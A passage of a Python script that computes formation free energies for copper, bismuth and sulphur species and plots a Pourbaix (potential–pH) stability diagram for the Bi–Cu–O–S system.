dGf_CuO= (Ee_CuO+Fvib_CuO) -(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2); dGf_Cu2O=(Ee_Cu2O+Fvib_Cu2O) -2.0*(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2); dGf_CuOH2_s= (Ee_CuOH2_s+Fvib_CuOH2_s) -(Ee_Cu+Fvib_Cu)-(Ee_O2+Ftot_O2)-(Ee_H2+F_H); dGf_Bi2O3= ((Ee_Bi2O3)+Fvib_Bi2O3) -2.0*(Ee_Bi+Fvib_Bi)-1.5*(Ee_O2-Ftot_O2); dGf_Bi2O5= ((Ee_Bi2O5)+Fvib_Bi2O5) -2.0*(Ee_Bi+Fvib_Bi)-2.5*(Ee_O2-Ftot_O2); dGf_Bi2O4= ((Ee_Bi2O4)+Fvib_Bi2O4) -2.0*(Ee_Bi+Fvib_Bi)-2.0*(Ee_O2-Ftot_O2); dGf_Bi4O7= ((Ee_Bi4O7)+Fvib_Bi4O7) -4.0*(Ee_Bi+Fvib_Bi)-3.5*(Ee_O2-Ftot_O2); dGf_Cu2S=(Ee_Cu2S+Fvib_Cu2S) -2*(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S); dGf_Cu7S4=(Ee_Cu7S4+Fvib_Cu7S4) -7*(Ee_Cu+Fvib_Cu)-4*(Ee_S+Fvib_S); dGf_CuS=(Ee_CuS+Fvib_CuS) -(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S); dGf_CuS2=(Ee_CuS2+Fvib_CuS2) -(Ee_Cu+Fvib_Cu)-2*(Ee_S+Fvib_S); dGf_Cu2SO4_3=(Ee_Cu2SO4_3+Fvib_Cu2SO4_3) -2*(Ee_Cu+Fvib_Cu)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2); dGf_BiCu=(Ee_BiCu+Fvib_BiCu) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi); dGf_CuBiO2_2=(Ee_CuBiO2_2+Fvib_CuBiO2_2) -(Ee_Cu+Fvib_Cu)-2*(Ee_Bi+Fvib_Bi)-2.0*((Ee_O2)-Ftot_O2); dGf_BiS2=(Ee_BiS2+Fvib_BiS2) -(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S); dGf_Bi2S3=(Ee_Bi2S3+Fvib_Bi2S3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S); dGf_Bi2S2O=(Ee_Bi2S2O+Fvib_Bi2S2O) -2*(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2); dGf_Bi2SO4_3=(Ee_Bi2SO4_3+Fvib_Bi2SO4_3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2); dGf_Bi14OS24=(Ee_Bi14OS24+Fvib_Bi14OS24) -14*(Ee_Bi+Fvib_Bi)-24*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2); dGf_Bi2SO2=(Ee_Bi2SO2+Fvib_Bi2SO2) -2*(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-1.0*((Ee_O2)-Ftot_O2); dGf_BiSCuO=(Ee_BiSCuO+Fvib_BiSCuO) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2); dGf_Cu3BiS3=(Ee_Cu3BiS3+Fvib_Cu3BiS3) -3*(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S); dGf_Cu4Bi4S9=(Ee_Cu4Bi4S9+Fvib_Cu4Bi4S9) -4*(Ee_Cu+Fvib_Cu)-4*(Ee_Bi+Fvib_Bi)-9*(Ee_S+Fvib_S); dGf_Cu4BiS2_5=(Ee_Cu4BiS2_5+Fvib_Cu4BiS2_5)-4*(Ee_Cu+Fvib_Cu)-5*(Ee_Bi+Fvib_Bi)-10*(Ee_S+Fvib_S); dGf_CuBiS2=(Ee_CuBiS2+Fvib_CuBiS2) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S); #Set the reference values dGf_Cu=0.0; dGf_Bi=0.0; dGf_S=0.0; ############################################################################### ############################################################################### ############################################################################### ############################################################################### ############## Aqueous Ion Free Energies of Formation ######################### #Free Energies of Formation in eV/f.u. 
##Elemental Bismuth Species dGf_Bi_3Plus= 0.6430898 dGf_BiOH_2Plus= -1.6968378 dGf_BiO_Plus= -1.4977965 ##Elemental Copper Species dGf_Cu1= 0.506502 dGf_Cu2= 0.674092 dGf_CuOH2_minus= -3.4518209 dGf_CuOH3= -5.1197432 dGf_CuOH_Plus= -1.3127387 dGf_CuOH4_2=-6.814302 dGf_CuOH2= -3.2666113 dGf_CuOH = -1.2677578 dGf_Cu2OH2_2plus=-2.942417 dGf_Cu3OH4_2plus=-6.567839 #Elemental Sulphur Species dGf_H2S=-0.283601 dGf_HS_Minus=0.13053 dGf_S_2Minus=0.9521892 dGf_S2_2Minus=0.8563979 dGf_S3_2Minus=0.7791664 dGf_S4_2Minus=0.7204948 dGf_S5_2Minus=0.6803396 dGf_H2S2O3=-5.6329986 dGf_HS2O3_Minus=-5.6156529 dGf_S2O3_2Minus=-5.515915 dGf_S5O6_2Minus=-9.9087 dGf_S4O6_2Minus=-10.5939 dGf_HS2O4_Minus=-6.13203282 dGf_S2O4_2Minus=-5.9842 dGf_S3O6_2Minus=-9.930382 dGf_H2SO3=-5.580528 dGf_HSO3_Minus=-5.464 dGf_SO3_2Minus=-5.03457 dGf_S2O6_2Minus=-10.02 dGf_H2SO4=-7.6901922 dGf_HSO4_Minus=-7.8029389 dGf_SO4_2Minus=-7.6901922 dGf_S2O8_2Minus=-11.361 dGf_HSO5_Minus= -6.60739025 dGf_S2O5_2Minus= -8.195817793 #Water dGf_H2O=-2.458; ############################################################################### ############################################################################### ############################################################################### ################################################################################ ############# CONVERT from eV to kJ/mol #################################### ############################################################################### dGf_Cu= dGf_Cu*F; dGf_CuO= dGf_CuO*F; dGf_Cu2O= dGf_Cu2O*F; dGf_Cu1= dGf_Cu1*F; dGf_Cu2= dGf_Cu2*F; dGf_CuOH4_2= dGf_CuOH4_2*F; dGf_CuOH2_minus= dGf_CuOH2_minus*F; dGf_CuOH3= dGf_CuOH3*F; dGf_CuOH_Plus= dGf_CuOH_Plus*F; dGf_CuOH2= dGf_CuOH2*F; dGf_CuOH = dGf_CuOH*F; dGf_Cu2OH2_2plus=dGf_Cu2OH2_2plus*F; dGf_Cu3OH4_2plus=dGf_Cu3OH4_2plus*F; dGf_CuOH2_s=dGf_CuOH2_s*F dGf_Bi= dGf_Bi*F; dGf_Bi2O3= dGf_Bi2O3*F; dGf_Bi2O5= dGf_Bi2O5*F; dGf_Bi2O4=dGf_Bi2O4*F; dGf_Bi4O7=dGf_Bi4O7*F; dGf_Bi_3Plus= dGf_Bi_3Plus*F; dGf_BiOH_2Plus= dGf_BiOH_2Plus*F; dGf_BiO_Plus= dGf_BiO_Plus*F; dGf_S= dGf_S*F; dGf_H2S=dGf_H2S*F; dGf_HS_Minus=dGf_HS_Minus*F; dGf_S_2Minus=dGf_S_2Minus*F; dGf_S2_2Minus=dGf_S2_2Minus*F; dGf_S3_2Minus=dGf_S3_2Minus*F; dGf_S4_2Minus=dGf_S4_2Minus*F; dGf_S5_2Minus=dGf_S5_2Minus*F; dGf_H2S2O3=dGf_H2S2O3*F; dGf_HS2O3_Minus=dGf_HS2O3_Minus*F; dGf_S2O3_2Minus=dGf_S2O3_2Minus*F; dGf_S5O6_2Minus=dGf_S5O6_2Minus*F; dGf_S4O6_2Minus=dGf_S4O6_2Minus*F; dGf_HS2O4_Minus=dGf_HS2O4_Minus*F; dGf_S2O4_2Minus=dGf_S2O4_2Minus*F; dGf_S3O6_2Minus=dGf_S3O6_2Minus*F; dGf_H2SO3=dGf_H2SO3*F; dGf_HSO3_Minus=dGf_HSO3_Minus*F; dGf_SO3_2Minus=dGf_SO3_2Minus*F; dGf_S2O6_2Minus=dGf_S2O6_2Minus*F; dGf_H2SO4=dGf_H2SO4*F; dGf_HSO4_Minus=dGf_HSO4_Minus*F; dGf_SO4_2Minus=dGf_SO4_2Minus*F; dGf_S2O8_2Minus=dGf_S2O8_2Minus*F; dGf_HSO5_Minus=dGf_HSO5_Minus*F; dGf_S2O5_2Minus=dGf_S2O5_2Minus*F; dGf_Cu2S=dGf_Cu2S*F; dGf_Cu7S4=dGf_Cu7S4*F; dGf_CuS=dGf_CuS*F; dGf_CuS2=dGf_CuS2*F; dGf_Cu2SO4_3=dGf_Cu2SO4_3*F; dGf_BiCu=dGf_BiCu*F; dGf_CuBiO2_2=dGf_CuBiO2_2*F; dGf_BiS2=dGf_BiS2*F; dGf_Bi2S3=dGf_Bi2S3*F; dGf_Bi2S2O=dGf_Bi2S2O*F; dGf_Bi2SO4_3=dGf_Bi2SO4_3*F; dGf_Bi14OS24=dGf_Bi14OS24*F; dGf_Bi2SO2=dGf_Bi2SO2*F; dGf_BiSCuO=dGf_BiSCuO*F; dGf_Cu3BiS3=dGf_Cu3BiS3*F; dGf_Cu4Bi4S9=dGf_Cu4Bi4S9*F; dGf_Cu4BiS2_5=dGf_Cu4BiS2_5*F; dGf_CuBiS2=dGf_CuBiS2*F; dGf_H2O= dGf_H2O*F; ############################################################################### ############################################################################### 
############################################################################### ############################################################################### ############### Populate the species matrix ################################ ############################################################################### species=np.zeros((65,8)) ######## Formation Energies ################################################### species[0,0]=0.00; species[1,0]=dGf_CuO species[2,0]=dGf_Cu2O species[3,0]=dGf_Cu1 species[4,0]=dGf_Cu2 species[5,0]=dGf_CuOH4_2 species[6,0]=dGf_CuOH2_minus species[7,0]=dGf_CuOH3 species[8,0]=dGf_CuOH_Plus species[9,0]=dGf_CuOH2 species[10,0]=dGf_CuOH species[11,0]=dGf_Cu2OH2_2plus species[12,0]=dGf_Cu3OH4_2plus species[13,0]=dGf_Bi species[14,0]=dGf_Bi2O3 species[15,0]=dGf_Bi2O5 species[16,0]=dGf_Bi2O4 species[17,0]=dGf_Bi4O7 species[18,0]=dGf_Bi_3Plus species[19,0]=dGf_BiOH_2Plus species[20,0]=dGf_BiO_Plus species[21,0]=dGf_S species[22,0]=dGf_H2S species[23,0]=dGf_HS_Minus species[24,0]=dGf_S_2Minus species[25,0]=dGf_S2_2Minus species[26,0]=dGf_S3_2Minus species[27,0]=dGf_S4_2Minus species[28,0]=dGf_S5_2Minus species[29,0]=dGf_H2S2O3 species[30,0]=dGf_HS2O3_Minus species[31,0]=dGf_S2O3_2Minus species[32,0]=dGf_S5O6_2Minus species[33,0]=dGf_S4O6_2Minus species[34,0]=dGf_HS2O4_Minus species[35,0]=dGf_S2O4_2Minus species[36,0]=dGf_S3O6_2Minus species[37,0]=dGf_H2SO3 species[38,0]=dGf_HSO3_Minus species[39,0]=dGf_SO3_2Minus species[40,0]=dGf_S2O6_2Minus species[41,0]=dGf_H2SO4 species[42,0]=dGf_HSO4_Minus species[43,0]=dGf_SO4_2Minus species[44,0]=dGf_S2O8_2Minus species[45,0]=dGf_HSO5_Minus species[46,0]=dGf_S2O5_2Minus species[47,0]=dGf_Cu2S species[48,0]=dGf_Cu7S4 species[49,0]=dGf_CuS species[50,0]=dGf_CuS2 species[51,0]=dGf_Cu2SO4_3 species[52,0]=dGf_BiCu species[53,0]=dGf_CuBiO2_2 species[54,0]=dGf_BiS2 species[55,0]=dGf_Bi2S3 species[56,0]=dGf_Bi2S2O species[57,0]=dGf_Bi2SO4_3 species[58,0]=dGf_Bi14OS24 species[59,0]=dGf_Bi2SO2 species[60,0]=dGf_CuBiS2 species[61,0]=dGf_Cu4Bi4S9 species[62,0]=dGf_Cu4BiS2_5 species[63,0]=dGf_BiSCuO species[64,0]=dGf_Cu3BiS3 ######## Electron Count ####################################################### #Cu species[0,1]=0.00; species[1,1]=2 species[2,1]=2 species[3,1]=1 species[4,1]=2 species[5,1]=2 species[6,1]=1 species[7,1]=2 species[8,1]=2 species[9,1]=2 species[10,1]=1 species[11,1]=4 species[12,1]=6 #Bi species[13,1]=0 species[14,1]=6 species[15,1]=10 species[16,1]=8 species[17,1]=14 species[18,1]=3 species[19,1]=3 species[20,1]=3 #S species[21,1]=0 species[22,1]=-2 species[23,1]=-2 species[24,1]=-2 species[25,1]=-2 species[26,1]=-2 species[27,1]=-2 species[28,1]=-2 species[29,1]=4 species[30,1]=4 species[31,1]=4 species[32,1]=10 species[33,1]=10 species[34,1]=6 species[35,1]=6 species[36,1]=10 species[37,1]=4 species[38,1]=4 species[39,1]=4 species[40,1]=10 species[41,1]=6 species[42,1]=6 species[43,1]=6 species[44,1]=14 species[45,1]=8 species[46,1]=8 #CuSOBi species[47,1]=0 species[48,1]=0 species[49,1]=0 species[50,1]=0 species[51,1]=24 species[52,1]=0 species[53,1]=8 #BiSO species[54,1]=0 species[55,1]=0 species[56,1]=2 species[57,1]=24 species[58,1]=2 species[59,1]=4 #CuBiS species[60,1]=0 species[61,1]=0 species[62,1]=0 #BiCuSO species[63,1]=2 species[64,1]=0 ######## Hydrogen H+ Count #################################################### #Cu species[0,2]=0 species[1,2]=2 species[2,2]=2 species[3,2]=0 species[4,2]=0 species[5,2]=4 species[6,2]=2 species[7,2]=3 species[8,2]=1 species[9,2]=2 species[10,2]=1 species[11,2]=2 
species[12,2]=4 #Bi species[13,2]=0 species[14,2]=6 species[15,2]=10 species[16,2]=8 species[17,2]=14 species[18,2]=0 species[19,2]=1 species[20,2]=2 #S species[21,2]=0 species[22,2]=-2 species[23,2]=-1 species[24,2]=0 species[25,2]=0 species[26,2]=0 species[27,2]=0 species[28,2]=0 species[29,2]=6 species[30,2]=5 species[31,2]=4 species[32,2]=12 species[33,2]=12 species[34,2]=6 species[35,2]=8 species[36,2]=12 species[37,2]=4 species[38,2]=5 species[39,2]=6 species[40,2]=12 species[41,2]=6 species[42,2]=7 species[43,2]=8 species[44,2]=16 species[45,2]=9 species[46,2]=10 #CuSBiO species[47,2]=0 species[48,2]=0 species[49,2]=0 species[50,2]=0 species[51,2]=24 species[52,2]=0 species[53,2]=8 #BiSO species[54,2]=0 species[55,2]=0 species[56,2]=2 species[57,2]=24 species[58,2]=2 species[59,2]=4 #BiCuS species[60,2]=0 species[61,2]=0 species[62,2]=0 #BiCuSO species[63,2]=2 species[64,2]=0 ########### Number of Coppers Cu ############################################## #Cu species[0,3]=1 species[1,3]=1 species[2,3]=2 species[3,3]=1 species[4,3]=1 species[5,3]=1 species[6,3]=1 species[7,3]=1 species[8,3]=1 species[9,3]=1 species[10,3]=1 species[11,3]=2 species[12,3]=3 #Bismuth and Sulphur species[13,3]=0 species[14,3]=0 species[15,3]=0 species[16,3]=0 species[17,3]=0 species[18,3]=0 species[19,3]=0 species[20,3]=0 species[21,3]=0 species[22,3]=0 species[23,3]=0 species[24,3]=0 species[25,3]=0 species[26,3]=0 species[27,3]=0 species[28,3]=0 species[29,3]=0 species[30,3]=0 species[31,3]=0 species[32,3]=0 species[33,3]=0 species[34,3]=0 species[35,3]=0 species[36,3]=0 species[37,3]=0 species[38,3]=0 species[39,3]=0 species[40,3]=0 species[41,3]=0 species[42,3]=0 species[43,3]=0 species[44,3]=0 species[45,3]=0 species[46,3]=0 #CuBiSO species[47,3]=2 species[48,3]=7 species[49,3]=1 species[50,3]=1 species[51,3]=2 species[52,3]=1 species[53,3]=1 #BiSO species[54,3]=0 species[55,3]=0 species[56,3]=0 species[57,3]=0 species[58,3]=0 species[59,3]=0 #CuBiS species[60,3]=1 species[61,3]=4 species[62,3]=4 #BiCuSO species[63,3]=1 species[64,3]=3 ########### Number of Bismuths Bi ############################################# #Copper species[0,4]=0 species[1,4]=0 species[2,4]=0 species[3,4]=0 species[4,4]=0 species[5,4]=0 species[6,4]=0 species[7,4]=0 species[8,4]=0 species[9,4]=0 species[10,4]=0 species[11,4]=0 species[12,4]=0 #Bismuth species[13,4]=1 species[14,4]=2 species[15,4]=2 species[16,4]=2 species[17,4]=4 species[18,4]=1 species[19,4]=1 species[20,4]=1 #Sulphur species[21,4]=0 species[22,4]=0 species[23,4]=0 species[24,4]=0 species[25,4]=0 species[26,4]=0 species[27,4]=0 species[28,4]=0 species[29,4]=0 species[30,4]=0 species[31,4]=0 species[32,4]=0 species[33,4]=0 species[34,4]=0 species[35,4]=0 species[36,4]=0 species[37,4]=0 species[38,4]=0 species[39,4]=0 species[40,4]=0 species[41,4]=0 species[42,4]=0 species[43,4]=0 species[44,4]=0 species[45,4]=0 species[46,4]=0 #CuSBiO species[47,4]=0 species[48,4]=0 species[49,4]=0 species[50,4]=0 species[51,4]=0 species[52,4]=1 species[53,4]=2 #BiSO species[54,4]=1 species[55,4]=2 species[56,4]=2 species[57,4]=2 species[58,4]=14 species[59,4]=2 #CuBiS species[60,4]=1 species[61,4]=4 species[62,4]=5 #BiCuSO species[63,4]=1 species[64,4]=1 ########### Number of Sulphurs S ############################################# #Coppers species[0,5]=0 species[1,5]=0 species[2,5]=0 species[3,5]=0 species[4,5]=0 species[5,5]=0 species[6,5]=0 species[7,5]=0 species[8,5]=0 species[9,5]=0 species[10,5]=0 species[11,5]=0 species[12,5]=0 #Bismuth species[13,5]=0 species[14,5]=0 
species[15,5]=0 species[16,5]=0 species[17,5]=0 species[18,5]=0 species[19,5]=0 species[20,5]=0 #Sulphur species[21,5]=1 species[22,5]=1 species[23,5]=1 species[24,5]=1 species[25,5]=2 species[26,5]=3 species[27,5]=4 species[28,5]=5 species[29,5]=2 species[30,5]=2 species[31,5]=2 species[32,5]=5 species[33,5]=4 species[34,5]=2 species[35,5]=2 species[36,5]=3 species[37,5]=1 species[38,5]=1 species[39,5]=1 species[40,5]=2 species[41,5]=1 species[42,5]=1 species[43,5]=1 species[44,5]=2 species[45,5]=1 species[46,5]=2 #CuSBiO species[47,5]=1 species[48,5]=4 species[49,5]=1 species[50,5]=2 species[51,5]=3 species[52,5]=0 species[53,5]=0 #BiSO species[54,5]=2 species[55,5]=3 species[56,5]=2 species[57,5]=3 species[58,5]=24 species[59,5]=1 #CuBiS species[60,5]=2 species[61,5]=9 species[62,5]=10 #BiCuSO species[63,5]=1 species[64,5]=3 ######### Number of H2O's ##################################################### #Copper species[0,6]=0 species[1,6]=1 species[2,6]=1 species[3,6]=0 species[4,6]=0 species[5,6]=4 species[6,6]=2 species[7,6]=3 species[8,6]=1 species[9,6]=2 species[10,6]=1 species[11,6]=2 species[12,6]=4 #Bi species[13,6]=0 species[14,6]=3 species[15,6]=5 species[16,6]=4 species[17,6]=7 species[18,6]=0 species[19,6]=1 species[20,6]=1 #Sulphur species[21,6]=0 species[22,6]=0 species[23,6]=0 species[24,6]=0 species[25,6]=0 species[26,6]=0 species[27,6]=0 species[28,6]=0 species[29,6]=3 species[30,6]=3 species[31,6]=3 species[32,6]=6 species[33,6]=6 species[34,6]=4 species[35,6]=4 species[36,6]=6 species[37,6]=3 species[38,6]=3 species[39,6]=3 species[40,6]=6 species[41,6]=4 species[42,6]=4 species[43,6]=4 species[44,6]=8 species[45,6]=5 species[46,6]=5 #CuSBiO species[47,6]=0 species[48,6]=0 species[49,6]=0 species[50,6]=0 species[51,6]=12 species[52,6]=0 species[53,6]=4 #BiSO species[54,6]=0 species[55,6]=0 species[56,6]=1 species[57,6]=12 species[58,6]=1 species[59,6]=2 #CuBiS species[60,6]=0 species[61,6]=0 species[62,6]=0 #BiCuSO species[63,6]=1 species[64,6]=0 ########## Aqueous Ions?????? 
################################################# #Copper species[0,7]=0 species[1,7]=0 species[2,7]=0 species[3,7]=1 species[4,7]=1 species[5,7]=1 species[6,7]=1 species[7,7]=1 species[8,7]=1 species[9,7]=1 species[10,7]=1 species[11,7]=1 species[12,7]=1 #Bismuth species[13,7]=0 species[14,7]=0 species[15,7]=0 species[16,7]=0 species[17,7]=0 species[18,7]=1 species[19,7]=1 species[20,7]=1 #Sulphur species[21,7]=0 species[22,7]=1 species[23,7]=1 species[24,7]=1 species[25,7]=1 species[26,7]=1 species[27,7]=1 species[28,7]=1 species[29,7]=1 species[30,7]=1 species[31,7]=1 species[32,7]=1 species[33,7]=1 species[34,7]=1 species[35,7]=1 species[36,7]=1 species[37,7]=1 species[38,7]=1 species[39,7]=1 species[40,7]=1 species[41,7]=1 species[42,7]=1 species[43,7]=1 species[44,7]=1 species[45,7]=1 species[46,7]=1 #CuSBiO species[47,7]=0 species[48,7]=0 species[49,7]=0 species[50,7]=0 species[51,7]=0 species[52,7]=0 species[53,7]=0 #BiSO species[54,7]=0 species[55,7]=0 species[56,7]=0 species[57,7]=0 species[58,7]=0 species[59,7]=0 #CuBiS species[60,7]=0 species[61,7]=0 species[62,7]=0 #BiCuSO species[63,7]=0 species[64,7]=0 #Function to determine species combinations try: combos=load('BiCuOS-speciesCombo.npy') num=load('BiCuOS-numberSpecies.npy') combo_num=int(num[0]) except OSError: print('Cannot Open File') ############################################################################### #### Determine which species are able to combine at the composition ########### ############################################################################### t=1 flag=1 f=np.zeros((3)) combos=np.zeros((45000,9,3)) combo_num=0 combos[combo_num, 0, 0]=-1 combos[combo_num, 0, 1]=-1 combos[combo_num, 0, 2]=-1 for k in range(0, len(species)): for m in range(0, len(species)): for p in range(0, len(species)): #Check to make sure each element is in this combination of species if((species[k, 3]>0 or species[m, 3] >0 or species[p, 3]>0) \ and (species[k, 4]>0 or species[m, 4] >0 or species[p, 4]>0) \ and (species[k, 5]>0 or species[m, 5] >0 or species[p, 5]>0)): #save species in array t=1 a = np.array([[species[k, 3],species[m, 3], species[p,3]], \ [species[k, 4],species[m, 4], species[p,4]], \ [species[k, 5],species[m, 5], species[p,5]]]) #check to see if each species contains a single element. This is a really long call. flag=1 if((species[k, 3]==0 and species[m, 3] ==0) or \ (species[m, 3]==0 and species[p, 3] ==0) or \ (species[k, 3]==0 and species[p, 3] ==0)): if((species[k, 4]==0 and species[m, 4] ==0) or \ (species[m, 4]==0 and species[p, 4] ==0) or \ (species[k, 4]==0 and species[p, 4] ==0)): if((species[k, 5]==0 and species[m, 5] ==0) or \ (species[m, 5]==0 and species[p, 5] ==0) or \ (species[k, 5]==0 and species[p, 5] ==0)): flag=0 #if so, find the composition through linear algebra. try: f=np.linalg.solve(a, composition) except: #print('Error: Species '+str(k)+', Species2: '+str(m)+', Species3: '+str(p)+'\n') t=1 t=0 #If there is at least one multi-element species in this combination if(flag==1): #test each linear combination for h in range(1, 20): for i in range(1, 20): for j in range(1, 20): #Is there a linear combination of the elements that will allow for the target composition? if(((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[1,0]+i*a[1,1]+j*a[1,2]))==composition[0]/composition[1] and \ ((h*a[1,0]+i*a[1,1]+j*a[1,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[1]/composition[2] and \ ((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[0]/composition[2]): #save the composition f[0]=h f[1]=i f[2]=j #Ending parameters, break loops t=0; h=40; i=40; j=40; #If there is a linear combination, save the species in the combos array. if (t==0): #print(str(combo_num)+': Species1: '+str(k)+', Species2: '+str(m)+'\n') #Species Number combos[combo_num, 0, 0]=k combos[combo_num, 0, 1]=m combos[combo_num, 0, 2]=p #Energy combos[combo_num, 1, 0]=species[k,0] combos[combo_num, 1, 1]=species[m,0] combos[combo_num, 1, 2]=species[p,0] #Electrons combos[combo_num, 2, 0]=species[k,1] combos[combo_num, 2, 1]=species[m,1] combos[combo_num, 2, 2]=species[p,1] #H+ combos[combo_num, 3, 0]=species[k,2] combos[combo_num, 3, 1]=species[m,2] combos[combo_num, 3, 2]=species[p,2] #Number of Cu atoms combos[combo_num, 4, 0]=species[k,3] combos[combo_num, 4, 1]=species[m,3] combos[combo_num, 4, 2]=species[p,3] #Number of Bi atoms combos[combo_num, 5, 0]=species[k,4] combos[combo_num, 5, 1]=species[m,4] combos[combo_num, 5, 2]=species[p,4] #Number of S atoms combos[combo_num, 6, 0]=species[k,5] combos[combo_num, 6, 1]=species[m,5] combos[combo_num, 6, 2]=species[p,5] #Number of H2O combos[combo_num, 7, 0]=species[k,6] combos[combo_num, 7, 1]=species[m,6] combos[combo_num, 7, 2]=species[p,6] #Fraction of each species in the final combo f_total=f[0]+f[1]+f[2]; combos[combo_num, 8, 0]=f[0]/f_total combos[combo_num, 8, 1]=f[1]/f_total combos[combo_num, 8, 2]=f[2]/f_total combo_num=combo_num+1; t=1 #print('entered') else: #Catch and switch the value of t back to no t=1 save('BiCuOS-speciesCombo.npy', combos) save('BiCuOS-numberSpecies.npy', asarray([[combo_num]])) print('The number of species combinations is '+ str(combo_num)+'.\n') ############################################################################### ############################################################################### ############################################################################### ############################################################################### ########### Chemical Potential Mesh Calculations ############################ ############################################################################### #should be as long as there are species considered #populate with smaller values that will be calculated. muValues=np.zeros((n+1,n+1,4)) sort=np.zeros((3,1)) #fill in the grid. Calculate the minimum mu at each grid point for i in range(0, n+1): #calculate the energies for each species number pH=lowpH+(i*pHcount); for j in range(0,n+1): U=Ulow+(j*Ucount); muValues[i,j,0]=-1 muValues[i,j,1]=-1 muValues[i,j,2]=-1 muValues[i,j,3]=100000000 #Go through all species, compare all pairs for k in range(0, combo_num): p=int(combos[k,0,0]); m=int(combos[k,0,1]); s=int(combos[k,0,2]); f1=combos[k,8,0]; f2=combos[k,8,1]; f3=combos[k,8,2]; #The first species's contribution to the mu current_eng=species[p,0] current_ele=F*U*(species[p,1]) current_H=R*T*np.log(10.0)*pH*(species[p,2]) current_H2O=dGf_H2O*(species[p,6]) current_aquI=R*T*np.log(nI)*(species[p,7]) current_NumEle=1 for t in range(3,6): if(species[p,t]>1): current_NumEle=current_NumEle*species[p,t]; current_mu=f1*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle); #The second species' contribution to the mu current_eng=species[m,0]; current_ele=F*U*(species[m,1]) current_H=R*T*np.log(10.0)*pH*(species[m,2]) current_H2O=dGf_H2O*(species[m,6]) current_aquI=R*T*np.log(nI)*(species[m,7]) current_NumEle=1 for t in range(3,6): if(species[m,t]>1): current_NumEle=current_NumEle*species[m,t]; current_mu=current_mu+f2*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle); #The third species' contribution to the mu current_eng=species[s,0]; current_ele=F*U*(species[s,1]) current_H=R*T*np.log(10.0)*pH*(species[s,2]) current_H2O=dGf_H2O*(species[s,6]) current_aquI=R*T*np.log(nI)*(species[s,7]) current_NumEle=1 for t in range(3,6): if(species[s,t]>1): current_NumEle=current_NumEle*species[s,t]; current_mu=current_mu+f3*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle); if(current_mu<muValues[i,j,3]): sort[0,0]=p sort[1,0]=m sort[2,0]=s a=np.sort(sort[:,0]) muValues[i,j,0]=a[0] muValues[i,j,1]=a[1] muValues[i,j,2]=a[2] muValues[i,j,3]=current_mu ############################################################################### ############################################################################### ############################################################################### ############################################################################### ################### Plot Pourbaix Diagram ################################### ############################################################################### flag = np.zeros((50,6)) # The first three indexes are the materials stored, the next three are the colors index=0; fig =plt.figure() ax=plt.subplot(111) ax = plt.gca() ax.set_xlim([lowpH,highpH]) ax.set_ylim([Ulow,Uhigh]) l=0; index=0; for i in range(0, n+1): pH=lowpH+i*pHcount; for j in range(0,n+1): U=Ulow+(Ucount*j); l=0 for k in range(0, len(flag)): if(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,1] and flag[k,2]==muValues[i,j,2]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,1]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,0]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,2]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,1]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,1]and flag[k,2]==muValues[i,j,0]): ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4) #break loop, the color is found k=len(flag)+1 l=1 if(l==0): label='M1: '+str(muValues[i,j,0])+', M2: '+str(muValues[i,j,1])+' M3: '+str(muValues[i,j,2]) flag[index,0] = muValues[i,j,0] flag[index,1] = muValues[i,j,1] flag[index,2] = muValues[i,j,2] flag[index,3] = random.random(); flag[index,4] = random.random(); flag[index,5] = random.random(); ax.plot(pH,U,'.', color = [flag[index,3],flag[index,4],flag[index,5]],markersize=4,label=label) index=index+1; #####Plot H2O and H2 lines################################## muH=np.zeros((pHrange+1)); muH2O=np.zeros((pHrange+1)); pHArray=np.zeros((pHrange+1)); for i in range(0, pHrange): pHArray[i] =lowpH+i; muH[i]=-0.059*pHArray[i]; muH2O[i]=1.23-0.059*pHArray[i]; 